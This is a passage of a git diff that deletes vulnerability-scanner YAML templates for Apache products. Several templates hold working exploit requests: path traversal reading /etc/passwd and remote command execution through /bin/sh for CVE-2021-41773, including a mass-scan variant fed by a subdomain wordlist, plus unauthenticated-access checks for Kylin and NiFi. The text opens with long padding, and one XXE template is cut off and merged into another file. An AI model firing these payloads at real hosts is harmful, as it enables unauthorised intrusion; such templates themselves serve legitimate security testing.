AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
- follow_redirects: false
- expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com/search/error.html"
-expression: r0()
-detail:
- author: Jarcis-cy(https://github.com/Jarcis-cy)
- links:
- - https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
diff --git a/tmp/apache/apache-httpd-cve-2021-41773-path-traversal.yaml b/tmp/apache/apache-httpd-cve-2021-41773-path-traversal.yaml
deleted file mode 100644
index c9bafb41e9..0000000000
--- a/tmp/apache/apache-httpd-cve-2021-41773-path-traversal.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
-manual: true
-transport: http
-rules:
- cgibin0:
- request:
- cache: true
- method: GET
- path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
- expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
- icons0:
- request:
- cache: true
- method: GET
- path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
- expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-expression: cgibin0() || icons0()
-detail:
- author: JingLing(https://github.com/shmilylty)
- links:
- - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
diff --git a/tmp/apache/apache-httpd-cve-2021-41773-rce.yaml b/tmp/apache/apache-httpd-cve-2021-41773-rce.yaml
deleted file mode 100644
index 37b0baef9c..0000000000
--- a/tmp/apache/apache-httpd-cve-2021-41773-rce.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-41773-rce
-manual: true
-transport: http
-set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
- body: echo;expr {{r1}} + {{r2}}
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
diff --git a/tmp/apache/apache-httpd-rce-363.yaml b/tmp/apache/apache-httpd-rce-363.yaml
deleted file mode 100644
index de1bcfbf67..0000000000
--- a/tmp/apache/apache-httpd-rce-363.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: apache-httpd-rce
-info:
- name: Apache HTTPd - 2.4.49 (CGI enabled) RCE
- author: pdteam
- severity: critical
- description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
- reference:
- - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- - https://twitter.com/ptswarm/status/1445376079548624899
- - https://github.com/blasty/CVE-2021-41773
- tags: cve,cve2021,rce,apache
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- echo Content-Type: text/plain; echo; id
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- condition: and
- part: body
- words:
- - 'uid='
- - 'gid='
- - 'groups='
- extractors:
- - type: regex
- regex:
- - "(u|g)id=.*"
diff --git a/tmp/apache/apache-kylin-unauth-cve-2020-13937.yaml b/tmp/apache/apache-kylin-unauth-cve-2020-13937.yaml
deleted file mode 100644
index c697addab7..0000000000
--- a/tmp/apache/apache-kylin-unauth-cve-2020-13937.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-apache-kylin-unauth-cve-2020-13937
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /kylin/api/admin/config
- expression: response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
-expression: r0()
-detail:
- author: JingLing(github.com/shmilylty)
- links:
- - https://s.tencent.com/research/bsafe/1156.html
diff --git a/tmp/apache/apache-kylin.yaml b/tmp/apache/apache-kylin.yaml
deleted file mode 100644
index 9488c9585d..0000000000
--- a/tmp/apache/apache-kylin.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: apache-kylin
-priority: 2
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 200
- headers: {}
- keyword:
- -
- favicon_hash: []
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - href="/kylin/"
- favicon_hash: []
diff --git a/tmp/apache/apache-loadbalancer-364.yaml b/tmp/apache/apache-loadbalancer-364.yaml
deleted file mode 100644
index 1f913a2652..0000000000
--- a/tmp/apache/apache-loadbalancer-364.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: apache-loadbalancer
-
-info:
- name: Apache Load Balancer Manager
- author: nithissh
- severity: informative
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/balancer-manager"
- matchers:
- - type: word
- words:
- - "Load Balancer Manager"
- part: body
diff --git a/tmp/apache/apache-mesos.yaml b/tmp/apache/apache-mesos.yaml
deleted file mode 100644
index 4903fad856..0000000000
--- a/tmp/apache/apache-mesos.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: apache-mesos
-priority: 3
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - 
- favicon_hash: []
diff --git a/tmp/apache/apache-nifi-api-unauthorized-access.yaml b/tmp/apache/apache-nifi-api-unauthorized-access.yaml
deleted file mode 100644
index 166a170a45..0000000000
--- a/tmp/apache/apache-nifi-api-unauthorized-access.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-apache-nifi-api-unauthorized-access
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /nifi-api/flow/current-user
- follow_redirects: false
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
-expression: r0()
-detail:
- author: wulalalaaa(https://github.com/wulalalaaa)
- links:
- - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
diff --git a/tmp/apache/apache-nifi-unauth.yaml b/tmp/apache/apache-nifi-unauth.yaml
deleted file mode 100644
index 4797d22cf8..0000000000
--- a/tmp/apache/apache-nifi-unauth.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: Apache Nifi-Unauthenticated
-info:
- name: Apache Nifi-Unauthenticated
- author: notnotnotveg
- severity: informative
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/nifi-api/flow/current-user"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "identity"
- part: body
- condition: and
- extractors:
- - type: regex
- part: body
- regex:
- - "\"identity\":\"(.*?)\""
diff --git a/tmp/apache/apache-nifi.yaml b/tmp/apache/apache-nifi.yaml
deleted file mode 100644
index 24c1a59fa0..0000000000
--- a/tmp/apache/apache-nifi.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: apache-nifi
-priority: 1
-nuclei_tags:
- - - nifi
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - /nifi
- favicon_hash: []
diff --git a/tmp/apache/apache-ofbiz-cve-2018-8033-xxe.yaml b/tmp/apache/apache-ofbiz-cve-2018-8033-xxe.yaml
deleted file mode 100644
index b019b598b3..0000000000
--- a/tmp/apache/apache-ofbiz-cve-2018-8033-xxe.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /webtools/control/xmlrpc
- headers:
- Content-Type: application/xml
- body: ]>
- favicon_hash: []
diff --git a/tmp/apache/apache-server-info.yml b/tmp/apache/apache-server-info.yml
deleted file mode 100644
index a344d0144a..0000000000
--- a/tmp/apache/apache-server-info.yml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: apache-server-info
-
-info:
- name: Check Apache Server Info
- author: DoubleTake (https://twitter.com/LeDoubleTake)
- severity: low
- description: This template checks if the some Apache endpoints can leak information like "Server Version".
-
- tags:
- - server-info
- - server-status
- - balancer-manager
- - apache
- - information
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/server-info"
- - "{{BaseURL}}/server-status"
- - "{{BaseURL}}/balancer-manager"
-
- matchers:
- - type: word
- part: response
- words:
- - "Server Version:"
\ No newline at end of file
diff --git a/tmp/apache/apache-serverstatus.yaml b/tmp/apache/apache-serverstatus.yaml
deleted file mode 100644
index a008c33572..0000000000
--- a/tmp/apache/apache-serverstatus.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-id: apache-serverstatus
-info:
- name: Apache Server Status Page
- author: notnotnotveg
- severity: informative
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/server-status"
- matchers:
- - type: word
- words:
- - "